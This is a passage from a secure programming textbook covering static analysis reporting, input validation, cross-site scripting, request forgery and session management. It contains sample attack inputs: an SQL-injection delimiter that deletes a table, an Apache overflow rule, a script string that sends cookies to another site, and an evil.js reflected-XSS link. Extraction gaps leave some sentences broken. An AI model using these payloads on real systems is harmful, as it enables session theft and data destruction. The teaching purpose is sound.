Critical (C), High (H), Medium (M), and Low (L). Audit Workbench groups results into folders based on a three-tier scale. It calls the folders Hot, Warning, and Info. A fourth folder displays all issues. Figure 4.11 shows the Audit Workbench folder view. 108 Chapter 4 Static Analysis Internals Folders hold groups of issues. By default, issues in a folder are grouped by type and then by program location. They can be re-sorted and searched. Figure 4.11 Sorting and searching results in Audit Workbench. Eliminating Unwanted Results Reviewing unwanted results is no fun, but reviewing the same unwanted results more than once is maddening. All advanced static analysis tools provide mechanisms for suppressing results so that they will not be reported in subsequent analysis runs. If the system is good, suppression information will carry forward to future builds of the same codebase. Similarly, auditors should be able to share and merge suppression information so that multiple people don’t need to audit the same issues. Users should be able to turn off entire categories of warnings, but they also need to be able to eliminate individual errors. Many tools allow results to be suppressed using pragmas or code annotations, but if the person performing the code review does not have permission to modify the code, there needs to be a way to store suppression information outside the code. One possibility is to simply store the filename, line number, and issue type. The problem is that even a small change to the file can cause all the line numbers to shift, thereby invalidating the suppression information. This problem can be lessened by storing a line number as an offset from the beginning of the function it resides in or as an offset from the nearest labeled statement. Another approach, which is especially useful if a result includes a trace 4.4 Reporting Results 109 through the program instead of just a single line, is to generate an identifier for the result based on the program constructs that comprise the trace. Good input for generating the identifier includes the names of functions and variables, relevant pieces of the control flow graph, and identifiers for any rules involved in determining the result. Explaining the Significance of the Results Good bug reports from human testers include a description of the problem, an explanation of who the problem affects or why it is important, and the steps necessary to reproduce the problem. But even good bug reports are occasionally sent back marked “could not reproduce” or “not an issue.” When that happens, the human tester gets a second try at explaining the situation. Static analysis tools don’t get a second try, so they have to make an effective argument the first time around. This is particularly difficult because a programmer might not immediately understand the security ramifications of a finding. A scenario that might seem far-fetched to an untrained eye could, in fact, be easy pickings for an attacker. The tool must explain the risk it has identified and the potential impact of an exploit. Audit Workbench makes its case in two ways. First, if the result is based on tracking tainted data through the program, it presents a dataflow trace that gives the path through the program that an exploit could take. Second, it provides a textual description of the problem in both a short form and a detailed form. Figure 4.12 shows a dataflow trace and a short explanation. Figure 4.12 Audit Workbench explains a result with a dataflow trace (when available) and a brief explanation. 110 Chapter 4 Static Analysis Internals The detailed explanation is divided into five parts: • The abstract, a one sentence explanation of the problem • A description that explains the specific issue in detail and references the specifics of the issue at hand (with code examples) • Recommendations for how the issue should be fixed (with a different recommendation given depending on the specifics of the issue at hand) • Auditing tips that explain what a reviewer should do to verify that there is indeed a problem • References that give motivated reviewers a place to go to read more if they are so inclined For these two lines of code 36 fread(buf, sizeof(buf), FILE); 37 strcpy(ret, buf); Audit Workbench would display the following detailed explanation: String Termination Error ABSTRACT Relying on proper string termination may result in a buffer overflow. DESCRIPTION String termination errors occur when: 1. Data enter a program via a function that does not null terminate its output. In this case, the data enter at fread in reader.c at line 36. 2. The data are passed to a function that requires its input to be null terminated. In this case, the data are passed to strcpy in reader.c at line 37. Example 1: The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a null terminator. 4.4 Reporting Results 111 #define MAXLEN 1024 ... char pathbuf[MAXLEN]; ... read(cfgfile,inputbuf,MAXLEN); //does not null terminate strcpy(pathbuf,inputbuf); //requires null terminated input ... The code in Example 1 will behave correctly if the data read from cfgfile are null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected null character, the call to strcpy() will continue copying from memory until it encounters an arbitrary null character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack. Example 2: In the following code, readlink() expands the name of a symbolic link stored in the buffer path so that the buffer buf contains the absolute path of the file referenced by the symbolic link. The length of the resulting value is then calculated using strlen(). ... char buf[MAXPATH]; ... readlink(path, buf, MAXPATH); int length = strlen(buf); ... The code in Example 2 will not behave correctly because the value read into buf by readlink() will not be null-terminated. In testing, vulnerabilities such as this one might not be caught because the unused contents of buf and the memory immediately following it might be null, thereby causing strlen() to appear as if it is behaving correctly. However, in the wild, strlen() will continue traversing memory until it encounters an arbitrary null character on the stack, which results in a value of length that is much larger than the size of buf and could cause a buffer overflow in subsequent uses of this value. Traditionally, strings are represented as a region of memory containing data terminated with a null character. Older string handling methods 112 Chapter 4 Static Analysis Internals frequently rely on this null character to determine the length of the string. If a buffer that does not contain a null terminator is passed to one of these functions, the function will read past the end of the buffer. Malicious users typically exploit this type of vulnerability by injecting data with unexpected size or content into the application. They might provide the malicious input either directly as input to the program or indirectly by modifying application resources, such as configuration files. If an attacker causes the application to read beyond the bounds of a buffer, the attacker might be able to use a resulting buffer overflow to inject and execute arbitrary code on the system. RECOMMENDATIONS As a convention, replace all calls to strcpy() and similar functions with their bounded counterparts, such as strncpy(). On Windows platforms, consider using functions defined in strsafe.h, such as StringCbCopy(), which takes a buffer size in bytes, or StringCchCopy(), which takes a buffer size in characters. On BSD UNIX systems, strlcpy() can be used safely because it behaves the same as strncpy(), except that it always null-terminates its destination buffer. On other systems, always replace instances of strcpy(d, s) with strncpy(d, s, SIZE_D) to check bounds properly and prevent strncpy() from overflowing the destination buffer. For example, if d is a stack-allocated buffer, SIZE_D can be calculated using sizeof(d). If your security policy forbids the use of strcpy(), you can enforce the policy by writing a custom rule to unconditionally flag this function during a source analysis of an application. Another mechanism for enforcing a security policy that disallows the use of strcpy() within a given code base is to include a macro that will cause any use of strcpy to generate a compile error: #define strcpy unsafe_strcpy AUDITING TIPS At first glance, the following code might appear to correctly handle the fact that readlink() does not null-terminate its output. But read the code carefully; this is an off-by-one error. Summary 113 ... char buf[MAXPATH]; int size = readlink(path, buf, MAXPATH); if (size != -1){ buf[size] = ‘\0’; strncpy(filename, buf, MAXPATH); length = strlen(filename); } ... By calling strlen(), the programmer relies on a string terminator. The programmer has attempted to explicitly null-terminate the buffer to guarantee that this dependency is always satisfied. The problem with this approach is that it is error prone. In this example, if readlink() returns MAXPATH, then buf[size] will refer to a location outside the buffer; strncpy() will fail to null-terminate filename, and strlen() will return an incorrect (and potentially huge) value. REFERENCES [1] M. Howard and D. LeBlanc. Writing Secure Code, Second Edition. Microsoft Press, 2003. (Discussion of Microsoft string-manipulation APIs.) Summary Major challenges for a static analysis tool include choosing an appropriate representation for the program being analyzed (building a model) that makes good trade-offs between precision and scalability, and choosing algorithms capable of finding the target set of defects. Essential static analysis problems often involve some of the same techniques as compiler optimization problems, including tracking dataflow and control flow. Tracking tainted data through a program is particularly relevant to identifying security defects because so many security problems are a result of trusting untrustworthy input. Good static analysis tools are rule driven. Rules tell the analysis engine how to model the environment and the effects of library and system calls. 114 Chapter 4 Static Analysis Internals Rules also define the security properties that the tool will check against. Good static analysis tools are extensible—they allow the user to add rules to model new libraries or environments and to check for new security properties. Ease of use is an often-overlooked but critical component of a static analysis tool. Users need help understanding the results the tool finds and why they are important. PART II Pervasive Problems Chapter 5 Handling Input 117 Chapter 6 Buffer Overflow 175 Chapter 7 Bride of Buffer Overflow 235 Chapter 8 Errors and Exceptions 265 This page intentionally left blank 5 Handling Input Distrust and caution are the parents of security. —Benjamin Franklin The most important defensive measure developers can take is to thoroughly validate the input their software receives. Input Validation and Representation is Kingdom #1 because unchecked or improperly checked input is the source of some of the worst vulnerabilities around, including buffer overflow, SQL injection, and a whole host of others. Ask your local software security guru to name the single most important thing that developers can do to write secure code, and nine out of ten will tell you, “Never trust input.” Now try saying “Never trust input” to a group of programmers, and take stock of the quizzical looks on their faces. This edict meets with some skepticism for good reason. After all, there are only a small set of good programs you can write that require no input. You can compute pi or discover really large prime numbers, but go much beyond that, and you’re going to need some input. If you can’t trust input, how can your program do anything useful? Of course programs need to accept input, and computing a good result depends on having good input. If the purpose of your program is to retrieve an account balance from a database and display it to a user, and the database says the balance is $100, your program probably has no way to determine whether the balance should really be $1,000 or –$20. However, your program should be able to tell the difference between input that might feasibly be correct and input that is most definitely bogus. If the database says the account balance is “../../../../../../var/log/system.log” or $1,000,000,000,000,000,000,000,000,000, your code should not play along. The programmer is the most qualified individual to define the kinds of input that are valid in the context their code. Situations will always arise in which you have to depend on correct input to produce correct results. You cannot be responsible for knowing whether all the input you receive is 117 118 Chapter 5 Handling Input correct. You can, however, be responsible for ensuring that the input you accept is not obviously wrong. Don’t expect input to be formatted properly, make sense, be self-consistent, follow normal encoding conventions, or adhere to any sort of standard. Don’t expect that you can trust input just because it comes from a source that seems like it should be wholesome and reliable. Don’t trust input just because you wrote the program that is supposed to generate that input; your program might find itself receiving input from a less trustworthy source or the trusted source itself might be compromised. When your input validation code identifies a problem, gracefully decline to accept the request. Don’t patch it up and try to soldier on. In short, be suspicious about the input you handle, and ensure that when input does not match your expectations, you chart a secure course nonetheless. You have to accept input, but you can’t trust it—so what do you do? You sanity-check it. You corroborate it. You take control and limit it to only the values that you know for certain are acceptable. We refer to these activities collectively as input validation. This chapter looks at what needs to be validated, how to perform validation and how to respond when input fails a validation check, and how to structure your software to make good input validation easier. We discuss the various ways that program input should be validated, strategies for performing validation, and ways to verify that your strategy has been implemented correctly. Along the way, we look at a multitude of security problems that resulted from inadequate input validation. In subsequent chapters, input validation problems come up repeatedly in the context of various program activities. In those later chapters, we look at individual input validation requirements and specific vulnerabilities related to mishandled input. The primary message in this chapter is that no form or aspect of program input should be trusted by default. The chapter unfolds as follows: • What to validate • Validate all input. Validate every piece of input the program uses. Make it easy to verify that all input is validated before it is used. • Validate input from all sources. Validate input from all sources, including command-line parameters, configuration files, database queries, environment variables, network services, registry values, system properties, temporary files, and any other source outside your program. 5.1 What to Validate 119 • Establish trust boundaries. Store trusted and untrusted data separately to ensure that input validation is always performed. • How to validate • Use strong input validation. Use the strongest form of input validation applicable in a given context. Prefer indirect selection or whitelisting. • Avoid blacklisting. Do not fall back on blacklisting just because stronger input validation is difficult to put in place. • Don’t mistake usability for security. Do not confuse validation that an application performs for usability purposes with input validation for security. • Reject bad data. Reject data that fail validation checks. Do not repair it or sanitize it for further use. • Make good input validation the default. Use a layer of abstraction around important or dangerous operations to ensure that security checks are always performed and that dangerous conditions cannot occur. • Always check input length. Validate input against a minimum expected length and a maximum expected length. • Bound numeric input. Check numeric input against both a maximum value and a minimum value as part of input validation. Watch out for operations that might be able to carry a number beyond their maximum or minimum value. The chapter wraps up with a look at metacharacter vulnerabilities, including SQL injection, command injection, and log forging. 5.1 What to Validate Most interesting programs accept input from multiple sources and operate on the data they accept in a variety of ways. Input validation plays a critical role in security from the point a program first reads data from an outside source until it uses the data in any number of security-relevant contexts. This section discusses the two sides of input validation: the kinds of input that require validation and the kinds of operations that depend on validated input. 120 Chapter 5 Handling Input Validate All Input These three words are the mantra for the entire chapter: validate all input. When you meditate on them, consider the meaning of both validate and input in the context of your application. Define input broadly. Think beyond just the data that a user deliver to your front door. If an application consists of more than one process, validate the input to each process, even if that input is only supposed to arrive from another part of the application. Validate input even if it is delivered over a secure connection, arrives from a "trusted" source, or is protected by strict file permissions. Validate input even for programs that are accessed by only trusted users. Don’t make optimistic assumptions about any piece of input inherited from the environment, including Registry values and path names. Every check you perform denies your adversary an opportunity and provides you an added degree of assurance. Input validation routines can be broken down into two major groups: syntax checks that test the format of the input, and semantic checks that determine whether the input is appropriate, given the application’s logic and function. Syntax checking can often be decoupled from the application logic and placed close to the point where the data enter the program, while semantic checks commonly need to appear alongside application logic because the two are so closely related. While you’re coding, make it difficult or impossible for a programmer to come along later and add an input point to the application without extending the validation logic to cover it. The application should route all input through validation logic, and the validation logic should be to reject any input that cannot be validated. Make it impossible for a programmer to say “I forgot to do input validation.” Static Analysis: Identifying the Attack Surface An easy way to use static analysis to assist in code review is to simply have a tool point out all the places where the application accepts input. The first time you try it, you’re likely to be surprised at the number of locations that turn up. The collection of places where an application accepts input can loosely be termed the application’s attack surface [Howard and LeBlanc, 2002]. In a static analysis tool, the attack surface consists of all the program entry points and source function calls—that is, the set of function calls that are invoked externally or that introduce user input into the 5.1 What to Validate 121 program. Generally, the larger the attack surface, the more thought programmers will have to put into input validation. The companion CD includes a sample C program named qwik-smtpd. Chapter 14, “Source Code Analysis Exercises for C,” walks through the process of analyzing qwick-smtpd using static analysis, but as a preview, the static analysis tool identifies one entry point in qwik-smtpd.c: 86: int main(int argc, char* argv[]) And five source functions: 182: while(getline(inputLine,1024) != EOF) 383: fgets(line, sizeof(line), chk); 506: while((c = getchar()) != EOF) 584: while((c = getc(config)) != EOF) 614: while((c = getc(config)) != EOF) Validate Input from All Sources Do not allow the security of your software to depend on the keen intellect, deep insight, or goodwill of the people configuring, deploying, and maintaining it. Perform input validation not only on user input, but also on data from any source outside your code. This list should include, but not be limited to, the following: • Command-line parameters • Configuration files • Data retrieved from a database • Environment variables • Network services • Registry values • System properties • Temporary files We routinely encounter developers who would like to wipe various sources of input off their security radar. Essentially, their argument boils down to this: “I’m not expecting anyone to attack me from those vectors. Why should I take the time and effort required to make them secure?” That attitude leads to exactly the kinds of blind spots that make an attacker’s job easy. A short-sighted programmer might think, “If someone can change a 122 Chapter 5 Handling Input system property, they will already have won.” Then an attacker will find a way to make a small alteration to a system file or script, or might find a way to leverage an honest configuration mistake. In either case, the lack of input validation becomes a stepping stone the attacker uses on the way to a fullblown system compromise. Not all forms of input are equal. Input from a configuration file will almost certainly receive different treatment than input from a user. But regardless of the source, all input should be subject to validation for at least consistency and syntax. Next we walk through examples of security vulnerabilities caused by unvalidated input from sources that are sometimes ignored: configuration files, command-line parameters, database access, and network services. We return to the topic of unexpected input sources in other parts of the book. Chapter 9 discusses cross-site scripting vulnerabilities caused by input from the database, and Chapter 12, “Privileged Programs,” looks at privilegeescalation attacks based on data from temporary files and environment variables. Configuration Files Version 1.3.29 of Apache’s mod_regex and mod_rewrite modules contain a buffer overflow vulnerability caused by programmers who put too much faith in their configuration [Malo, 2003]. A typical Apache configuration allows directory-by-directory configuration through files named .htaccess. With this setup, users are given the opportunity to add their own configuration files to control the way the contents of each of their directories are displayed. The problem with mod_regex and mod_rewrite is that they expected regular expressions in their configuration directives to have nine or fewer capturing groups. (Capturing groups are a way of treating multiple characters as a single entity in regular expressions and are indicated by statements enclosed in parentheses.) Ten or more capturing groups cause a buffer overflow. This is the kind of input the program expects: RewriteRule ^/img(.*) /var/www/img$1 But the following input causes a buffer overflow: RewriteRule ^/img(.)(.)(.)(.)(.)(.)(.)(.)(.)(.*) \ /var/www/img$1$2$3$4$5$6$7$8$9$10 5.1 What to Validate 123 Example 5.1 lists the culprit code. The code in bold shows where Apache uses the ten-element array regmatch to hold back references to captures, and where it relies on the unbounded number of captures specified in a configuration file, later read into p->regexp->re_nsub, to bound the number of references to write into that fixed-size array. Example 5.2 shows how the code was fixed by changing both the array and the code that fills it to use the same compile-time constant. This bug opens up a number of opportunities for attack. First, users who have permission only to upload data to a Web server can now exploit the buffer overflow to run code as the Web server. Second, an attacker with no privileges whatsoever now only needs to find a way to upload a file into the server’s content tree to be able to execute code. In both cases, a bug in configuration parsing opens the server to new lines of attack. Example 5.1 A buffer overflow in Apache. A user who can modify an .htaccess file can crash the server or execute arbitrary code as the server by writing a regular expression with more than nine capturing groups. int ap_regexec(const regex_t *preg, const char *string, size_t nmatch, regmatch_t pmatch[], int eflags); typedef struct backrefinfo { char *source; int nsub; regmatch_t regmatch[10]; } backrefinfo; ... else { /* it is really a regexp pattern, so apply it */ rc = (ap_regexec(p->regexp, input, p->regexp->re_nsub+1, regmatch, 0) == 0); Example 5.2 The fix to the Apache buffer overflow. The array declaration and the code that fills the buffer now both refer to the same constant. typedef struct backrefinfo { char *source; int nsub; regmatch_t regmatch[AP_MAX_REG_MATCH]; } backrefinfo; ... else { /* it is really a regexp pattern, so apply it */ rc = (ap_regexec(p->regexp, input, AP_MAX_REG_MATCH, regmatch,0) == 0); 124 Chapter 5 Handling Input Command-Line Parameters Up through Version 2.1.9, Hibernate, a popular open source package for object/relational mapping, contains an excellent example of what not to do with command line input. (Thanks to Yekaterina Tsipenyuk O’Neil for pointing out this issue.) The Java version of Hibernate’s SchemaExport tool accepts a command-line parameter named "--delimiter", which it uses to separate SQL commands in the scripts it generated. Example 5.3 shows how it works in a simplified form. Example 5.3 Version 2.1.9 of Hibernate’s SchemaExport tool allows SQL injection through the command line. String delimiter; for (int i=0; i < args.length; i++) { if ( args[i].startsWith("--delimiter=") ) { delimiter = args[i].substring(12); } } ... for (int i = 0; i < dropSQL.length; i++) { try { String formatted = dropSQL[i]; if (delimiter!=null) formatted += delimiter; ... fileOutput.write( formatted + "\n" ); } The --delimiter option exists so that a user can specify the separator that should appear between SQL statements. Typical values might be a semicolon or a carriage return and a line feed. But the program does not place any restrictions on the argument’s value, so from a command-line parameter, you can write any string you want into the generated SQL script, including additional SQL commands. For example, if a simple SELECT query was provided with --delimiter ';', it would generate a script to execute the following command: SELECT * FROM items WHERE owner = "admin"; But if the same query was issued with the malicious option --delimiter '; DELETE FROM items;', it would generate a script that cleans out the items table with the following commands: 5.1 What to Validate 125 SELECT * FROM items WHERE owner = "admin"; DELETE FROM items; From a naïve perspective, this is of no consequence. After all, if you wanted to execute a malicious query, you could always specify it directly, right? This line of reasoning contains an implicit and dangerous set of assumptions about how the program will be used. It is now incumbent upon any programmer who wants to write a wrapper script around SchemaExport to understand that the --delimiter command-line parameter affects a query in an unconstrained fashion. The name delimiter suggests that the value should be something short, such as a piece of punctuation, but the program does no input validation at all; therefore, it is not acceptable to give control of this parameter to someone who is not authorized to write arbitrary commands into the output file. Want to write a Web front end for provisioning a new database? This code makes it easy for that new front end to unwittingly turn complete control of the new database over to the provisioner because now anyone who controls the input to SchemaExport can insert arbitrary SQL commands into the output. This is a security meltdown waiting to happen. Database Queries Unlike input received directly from an anonymous user, information from the database must often be granted a level of trust. In many cases, it is impossible to verify that data from the database are “correct” because the database is often the only source of truth. On the other hand, programs that rely on the database should verify that information retrieved from the database is well formed and meets reasonable expectations. Do not blindly rely on the database to ensure that your application will behave correctly. The following are just two examples of validation that can be performed on database data: • Check to make sure that only one row exists for values that are expected to be unique. The presence of two entries might indicate that an attacker managed to insert a falsified data entry. Database features, such as triggers or uniqueness constraints, might not be in effect. For example, you might find that a user has two entries indicating their account balance. The code in Example 5.4 makes no effort to verify the number of rows returned by the database; it simply uses the first row found. Example 5.5 gives a revised version that checks to make sure the database returns only one row. 126 Chapter 5 Handling Input Example 5.4 This code makes no effort to verify the number of rows the query returns; it simply uses the first row found. ResultSet rs = stmt.executeQuery();; int balance = rs.getInt(1); Example 5.5 This revised code checks that the query returns only one row. ResultSet rs = stmt.executeQuery(); if (! { throw new LookupException("no balance row"); } if (!rs.isLast()) { throw new LookupException("more than one balance row"); } int balance = rs.getInt(1); Static Analysis: The Database Is Input, Too Use static analysis to identify situations in which the program doesn’t pay attention to the number of rows a ResultSet contains. You can do this with a structural rule that looks for calls to that appear as call statements (and, therefore, are not in a predicate). Structural rule: FunctionCall fc: (fc.function is [name == "next" and enclosingClass.supers contains [Class: name == "java.sql.ResultSet"]]) and (fc in [CallStatement:]) This rule flags the call to in Example 5.4, but not the one in Example 5.5. • Check to make sure that fields contain safe, sane content that is free from metacharacter attacks. An attacker could manage to bypass input validation and attempt a stored injection or cross-site scripting attack. Even if the input validation for your application is perfect, the attacker 5.1 What to Validate 127 might be able to get information into the database through other programs or channels. For example, a nightly batch update from a partner company might update a user’s account information to include a string containing a This little bit of JavaScript expects the variable userName to have a vanilla value, such as this: Dave when it instead has a value such as this: "+new Image().src =''+document.cookie+" Then the blacklist has no effect. This attack string results in the user’s cookies being sent to an unauthorized Web site, but the attacker could just as easily insert any arbitrary JavaScript operation. Blacklisting is particularly dangerous because it might work well enough to lull developers into a false sense of security by preventing rudimentary attacks, such as blocking attackers from including ! Then the Web browser will execute the contents of evil.js. Initially, this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on his or her own computer? Figure 9.4 illustrates a potential attack scenario that takes place in four steps: 1. An attacker creates a malicious URL and uses an inviting e-mail message or some other social engineering trick to get a victim to visit the URL. 2. By clicking the link, the user unwittingly sends the malicious code up to the vulnerable Web application. 306 Chapter 9 Web Applications 3. The vulnerable Web application reflects the code back to the victim’s browser. 4. The victim’s browser executes the code as though it had legitimately originated from the application, and transmits confidential information back to the attacker. For example, if the vulnerable JSP in Example 9.2 was hosted at, an attacker might e-mail the following link to prospective victims: Click here This mechanism of exploiting vulnerable Web applications is called reflected cross-site scripting because the Web application reflects the attack back to the victim. 1. Attacker sends malicious link to victim. 2. Victim clicks link, makes request to vulnerable application. Attacker Victim Browser Application with XSS vulnerability 4. Browser executes attacker’s code, sends confidential data back to attacker. Figure 9.4 Reflected cross-site scripting 3. Application includes attacker’s code in HTTP response. If an application produces active Web pages that use request page parameters directly—for instance, by using JavaScript to parse the URL— the application could be vulnerable to reflected XSS without the need for any dynamic processing on the server. Example 9.3 is a sample script that comes with the Treeview JavaScript tree menu widget. The code looks at the URL, splits out the page parameters, and evaluates each one as a JavaScript statement. If this JavaScript is already stored in the victim’s browser cache, the attack will never even be transmitted to the server. 9.1 Input and Output Validation for the Web 307 Example 9.3 Cross-site scripting is not just a server-side concern. This JavaScript sample code from the Treeview menu widget is susceptible to XSS attacks that never leave the client. Example 9.4 lists another kind of XSS vulnerability. This time, the value of name is read from a database. As in Example 9.2, the code behaves correctly when the value of name is benign, but it does nothing to prevent an attack if the value of name contains malicious data. Example 9.4 The following Servlet code segment queries a database for an employee with a given ID and prints the corresponding employee’s name. String query = "select * from emp where id=?"; PreparedStatement stmt = conn.prepareStatement(query); stmt.setString(1, eid); ResultSet rs = stmt.executeQuery(); if (rs != null) {; String name = rs.getString("name"); out.println("Employee Name: " + name); } This code might appear less dangerous because name is read from a database, but if the value originates from externally supplied or user-controlled 308 Chapter 9 Web Applications data, the database can be a conduit for attacks. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user’s Web browser. This form of vulnerability is called stored cross-site scripting. Because the application stores the malicious content, there is a possibility that a single attack will affect multiple users without any action on their part. This means that teaching users not to click on links from untrusted sources will do nothing to prevent this sort of attack. On a historical note, XSS got its started this way with Web sites that offered a “guestbook” to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code. The application that stores the malicious data in the database might not be the same one that retrieves it. This is particularly nasty because different front-end applications could have different interfaces or use different communication protocols. Each application might do appropriate input validation in its own context, but by connecting the different applications to the same data store, the whole system can become vulnerable. Figure 9.5 illustrates one such scenario. Attacker 1. Attacker sends malicious data to application 1 Application 1 2. Application 1 writes malicious data to database Database Victim Application 2 4. Application 2 delivers attack to victim 3. Application 2 reads malicious data from database Figure 9.5 Stored cross-site scripting can involve multiple applications. 9.1 Input and Output Validation for the Web 309 The First XSS Worm The first self-propagating cross-site scripting attack we are aware of hit the MySpace Web site in 2005. The user samy took advantage of a stored cross-site scripting vulnerability so that any MySpace users who viewed his profile would automatically add him to their own profile. In the end, MySpace had to go completely offline to clean up the mess. Samy wrote a detailed explanation of the way he bypassed the MySpace defenses [samy, 2005]. It illustrates a variety of techniques for exploiting cross-site scripting vulnerabilities, and it is a perfect example of a failed attempt at blacklisting. Samy wrote the following: 1. MySpace blocks a lot of tags. In fact, they only seem to allow , s, and
s … maybe a few others (s, I think). They wouldn’t allow If an administrator for visits the malicious page while she has an active session on the site, she will unwittingly create an account for the attacker. This is a cross-site request forgery attack. It is possible because the application does not have a way to determine the provenance of the request—it could be a legitimate action chosen by the user or a faked action set up by an attacker. The attacker does not get to see the Web page that the bogus request generates, so the technique is useful only for requests that alter the state of the application. Most Web browsers send an HTTP header named referer along with each request. The referer header is supposed to contain the URL of the referring page, but attackers can forge it, so the referer header is not useful for determining the provenance of a request [Klein, 2006]. Applications that pass the session identifier on the URL rather than as a cookie do not have this problem because there is no way for the attacker to access the valid session identifier and include it as part of the bogus request. (Refer to Section 9.3 for more details on maintaining session state.) 328 Chapter 9 Web Applications For applications that use session cookies, the form must include some piece of information that the back-end form handler can use to validate the provenance of the request. One way to do that is to include a random request identifier on the form, like this:
Name of new user: Password for new user:
Then the back-end logic can validate the request identifier before processing the rest of the form data. The request identifier can be unique to each new instance of a form or can be shared across every form for a particular session. 9.3 Maintaining Session State From the beginning of this chapter, we’ve said that HTTP was not designed with applications in mind. If you’ve been looking for more evidence to support that assertion, look no further. Because HTTP is stateless, building almost any sort of sophisticated application requires passing a session identifier back and forth to associate a user’s previous requests with her next. Session identifiers can be passed back and forth as URL parameters, but today most applications handle them with cookies. The most common reason to use a session identifier is to allow a user to authenticate only once but carry on a series of interactions with the application. That means the security of the application depends on it being very difficult for an attacker to make use of the session identifier for an authenticated user. Good HTTP session management means picking strong session identifiers and ensuring that they’re issued and revoked at appropriate points in the program. This section looks at the following topics: • Writing a session management interface is tricky. In most cases, your effort is best spent selecting an application container that offers good session management facilities rather than creating your own sessionmanagement facilities. 9.3 Maintaining Session State 329 • For Web application containers that allow the session identifier length to be specified in a configuration file, make sure the session identifier contains at least 128 bits of random data, to prevent attackers from hijacking users’ session identifiers. • Enforce a maximum session idle time and a maximum session lifetime. • Make sure the user has a way to terminate the session. • Ensure that whenever a user is authenticated, the current session identi- fier is invalidated and a new one is issued. Use Strong Session Identifiers Your best bet for a strong, hassle-free system for creating and managing session identifiers is to use the mechanism built into your application container. This is not a sure thing, though; do not trust your application container until you have confirmed the session identifier length and the source of randomness used to generate the identifiers. Use session identifiers that include at least 128 bits of data generated by a cryptographically secure random number generator. A shorter session identifier leaves the application open to brute-force session-guessing attacks: If attackers can guess an authenticated user’s session identifier, they might be able to take over the user’s session. The rest of this explanation details a back-of-the-envelope justification for a 128-bit session identifier. The expected number of seconds required to guess a valid session identifier is given by this equation: 2B +1 2 A .S Where the variables are defined as follows: • B is the number of bits of entropy in the session identifier. • A is the number of guesses an attacker can try each second. • S is the number of valid session identifiers that are valid and available to be guessed at any given time. The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if 330 Chapter 9 Web Applications session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier, no matter what the identifier’s length was. Assuming that the session identifiers are being generated using a good source of random numbers, we estimate the number of bits of entropy in a session identifier to be half its total number of bits. For realistic identifier lengths, this is possible, though perhaps optimistic. A lower bound on the number of valid session identifiers available to be guessed is the number of users who are active on a site at any given moment. However, any users who abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64-bit session identifier, assume 32 bits of entropy. For a large Web site, assume that the attacker can try 10 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 6 hours. Now assume a 128-bit session identifier that provides 64 bits of entropy. With a very large Web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be guessed. Given these somewhat extreme assumptions in favor of the attacker, the expected time to successfully guess a valid session identifier is greater than 292 years. See the section “Random Numbers” in Chapter 11, “Privacy and Secrets,” for a more detailed discussion of gathering entropy and generating secure random numbers. No standardized approach exists for controlling the length of the session identifier used by a Servlet container. Example 9.11 shows how to control the session identifier length for BEA WebLogic. The length of the session identifier is specified as the number of characters in the identifier. Each character is a lowercase letter, an uppercase letter, or a number, so there are 62 possible values for each character. To get 128 pseudo-random bits, the identifier must contain at least 22 characters (128/log2(62) = 21.5). Our experimentation leads us to believe that the first 3 characters are not randomly generated, so WebLogic needs to be configured to create session identifiers of length 25 characters. 9.3 Maintaining Session State 331 Example 9.11 For BEA WebLogic, to use a 128-bit session identifier, the weblogic.xml configuration file should include a session-descriptor element named IDLength with a value of 25. IDLength 25 ... Static Analysis: Avoid Weak Session Identifiers Use static analysis to identify programs configured to use weak session identifiers. The following rule will flag session identifiers configured to be less than 25 characters long in weblogic.xml: Configuration rule: File Pattern: weblogic.xml XPath Expression: /weblogic-web-app/session-descriptor/ session-param[normalize-space(param-name)= 'IDLength' and param-value < 25 Enforce a Session Idle Timeout and a Maximum Session Lifetime Limiting a session’s lifetime is a trade-off between security and usability. From a convenience standpoint, it would be best if sessions never had to be terminated. But from a security standpoint, invalidating a user’s session after a timeout period protects the user and the system in the following ways: • It limits the period of exposure for users who fail to invalidate their session by logging out. • It reduces the average number of valid session identifiers available for an attacker to guess. • It makes it impossible for an attacker to obtain a valid session identifier and then keep it alive indefinitely. 332 Chapter 9 Web Applications Session Idle Timeout Be consistent across applications so that people in your organization know how to set the parameters correctly and so that your users understand what to expect. For any container that implements the Servlet specification, you can configure the session timeout in web.xml like this: 30 You can also set the session timeout on an individual session using the setMaxInactiveInterval() method: // Argument specifies idle timeout in seconds session.setMaxInactiveInterval(1800); Maximum Session Lifetime The Servlet specification does not mandate a mechanism for setting a maximum session lifetime, and not all Servlet containers implement a proprietary mechanism. You can implement your own session lifetime limiter as a Servlet filter. The doFilter() method in Example 9.12 stashes the current time in a session the first time a request is made using the session. If the session is still in use after the maximum session lifetime, the filter invalidates the session. Example 9.12 This Servlet filter invalidates a session after a maximum session lifetime. public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { if (request instanceof HttpServletRequest) { HttpServletRequest hres = (HttpServletRequest) request; HttpSession sess = hres.getSession(false); if (sess != null) { long now = System.currentTimeMillis(); long then = sess.getCreationTime(); if ((now - then) > MAX_SESSION_LIFETIME) { sess.invalidate(); 9.3 Maintaining Session State } } } chain.doFilter(request, response); } 333 Static Analysis: Ensure Users Can Log Out Include a logout link that allows users to invalidate their HTTP sessions. Allowing users to terminate their own session protects both the user and the system in the following ways: • A user at a public terminal might have no other way to prevent the next person at the terminal from accessing their account. • By terminating the session, the user protects his account even if an attacker subsequently takes control of the client computer. • By eliminating sessions that are not being used, the server reduces the average number of valid session identifiers available for an attacker to guess. The code behind a logout link might look something like this: request.getSession(true).invalidate(); In applications that use the Java HttpSession object for session management, use static analysis to determine whether the application calls invalidate() on the session. Manually audit calls to invalidate() to determine whether users can invalidate their sessions by logging out. If users cannot log out, the program does not provide its users the right tools to protect their sessions. The following 